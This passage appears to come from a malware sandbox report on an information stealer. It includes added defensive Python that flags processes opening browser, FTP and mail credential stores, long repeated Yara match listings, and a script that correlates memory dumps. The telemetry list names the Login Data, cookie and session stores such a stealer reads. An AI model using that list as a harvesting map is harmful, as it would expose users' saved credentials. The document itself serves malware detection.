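# Constructed telemetry: the stealer's accesses as recorded in this report,
# plus benign noise from a browser and an unrelated process.
PIF = r"C:\Users\Public\Libraries\xrbjyllC.pif"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    (4544, PIF, "RegOpenKey", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (4544, PIF, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (4544, PIF, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (4544, PIF, "FileOpen", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (4544, PIF, "FileOpen", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (4544, PIF, "FileOpen", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"),
    (4544, PIF, "FileOpen", r"C:\FTP Navigator\Ftplist.txt"),
    (4544, PIF, "FileOpen", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (4544, PIF, "RegOpenKey", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    (4544, PIF, "RegOpenKey", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (5120, CHROME, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (5120, CHROME, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (6001, r"C:\Windows\explorer.exe", "FileOpen", r"C:\Users\user\Documents\notes.txt"),
    (7200, r"C:\Users\user\AppData\Local\Temp\updater.exe", "FileOpen", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
]

if __name__ == "__main__":
    for pid, info in sorted(analyze(SAMPLE_EVENTS).items()):
        print(pid, info["image"], "FLAGGED" if info["flagged"] else "review", info["stores"])
```

With the sample events, PID 4544 is flagged on ten distinct stores, chrome.exe is exempt as the owner of its own files, explorer.exe never appears, and the Temp updater.exe is reported for a single Thunderbird access but stays below the threshold; that last case is the one to tune, since a lone access from an unusual location still merits a look.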

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
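The Yara evidence in these sections uses two naming schemes: UNPACKEDPE entries such as 11.2.xrbjyllC.pif.29a80000.9.raw.unpack and MEMORY dump entries such as 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp. Read side by side, the first field of both is the sandbox's process index (decimal in one, hexadecimal in the other: 11 = 0x0B, 17 = 0x11), the second is the dump phase, and the address fields agree (0x29A80000 in both), so the two lists can be joined. The script below is an added example, not part of the report: it parses both schemes and pairs each unpacked PE with the memory dump it was carved from, so an analyst can see which regions in which processes the rules keep hitting. The field meanings are inferred from the naming pattern on this page rather than taken from vendor documentation, and reading the first trailing field of a dump name as a Windows PAGE_* protection constant is an assumption.

```python
"""
Added example (not from the sandbox report): parse the UNPACKEDPE and MEMORY
Yara-match names listed above and pair each unpacked PE with the memory dump
whose page contains it. Field meanings (process index, dump phase, base
address) are inferred from the naming pattern on this page.
"""
import re
from collections import defaultdict

PAGE = 0x1000

# Names copied from the listing above.
UNPACKED = [
    "11.2.xrbjyllC.pif.29a80000.9.raw.unpack",
    "9.2.xrbjyllC.pif.2c240000.7.unpack",
    "17.2.xrbjyllC.pif.25040000.9.unpack",
    "11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack",
    "9.2.xrbjyllC.pif.299f0b8e.4.unpack",
    "17.2.xrbjyllC.pif.22680ee8.7.unpack",
]
MEMORY = [
    "0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp",
    "00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp",
    "00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp",
    "0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp",
    "00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp",
    "00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp",
]

# <proc>.<phase>.<image>.<hex base>.<index>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\."
    r"(?P<base>[0-9a-fA-F]+)\.(?P<idx>\d+)\.(?P<raw>raw\.)?unpack$")
# <proc hex8>.<phase hex8>.<id>.<base hex16>.<four hex8 flag fields>.sdmp
MEMORY_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<flags>(?:[0-9A-Fa-f]{8}\.){4})sdmp$")


def parse_unpacked(name):
    m = UNPACK_RE.match(name)
    if not m:
        raise ValueError(f"not an UNPACKEDPE name: {name}")
    return {"proc": int(m["proc"]), "phase": int(m["phase"]), "image": m["image"],
            "base": int(m["base"], 16), "index": int(m["idx"]),
            "raw": m["raw"] is not None}


def parse_memory(name):
    m = MEMORY_RE.match(name)
    if not m:
        raise ValueError(f"not a MEMORY dump name: {name}")
    flags = tuple(int(f, 16) for f in m["flags"].rstrip(".").split("."))
    return {"proc": int(m["proc"], 16), "phase": int(m["phase"], 16),
            "id": int(m["id"]), "base": int(m["base"], 16), "flags": flags}


def protection_hint(flags):
    """Assumption: the first flag field looks like a Windows PAGE_* constant
    (0x04 = PAGE_READWRITE, 0x40 = PAGE_EXECUTE_READWRITE)."""
    return {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}.get(
        flags[0], hex(flags[0]))


def process_indices(unpacked):
    """Distinct sandbox process indices that produced unpacked PEs."""
    return sorted({parse_unpacked(n)["proc"] for n in unpacked})


def correlate(unpacked, memory):
    """Map each UNPACKEDPE name to the MEMORY dump with the same process index
    and phase whose base is the page containing the PE's base, else None.
    Region sizes are not in the names, so a PE that sits beyond the first page
    of a larger dump is not paired."""
    dumps = defaultdict(dict)
    for name in memory:
        m = parse_memory(name)
        dumps[(m["proc"], m["phase"])][m["base"]] = name
    out = {}
    for name in unpacked:
        u = parse_unpacked(name)
        out[name] = dumps[(u["proc"], u["phase"])].get(u["base"] & ~(PAGE - 1))
    return out


if __name__ == "__main__":
    print("process indices:", process_indices(UNPACKED))
    for u, d in correlate(UNPACKED, MEMORY).items():
        hint = protection_hint(parse_memory(d)["flags"]) if d else "no page-aligned dump"
        print(f"{u} -> {d} [{hint}]")
```

Three process indices (9, 11, 17) appear across all of the listings, consistent with the three xrbjyllC.pif PIDs (4544, 4108, 6568) in the MEMORYSTR entries, and the same few bases recur in every block (0x2C240000 and 0x2C980000 in process 9, 0x26EC0000 and 0x29A80000 in process 11, 0x22680000 and 0x25040000 in process 17); those dumps are the ones to pull for static analysis rather than the many sub-region hits that point into them.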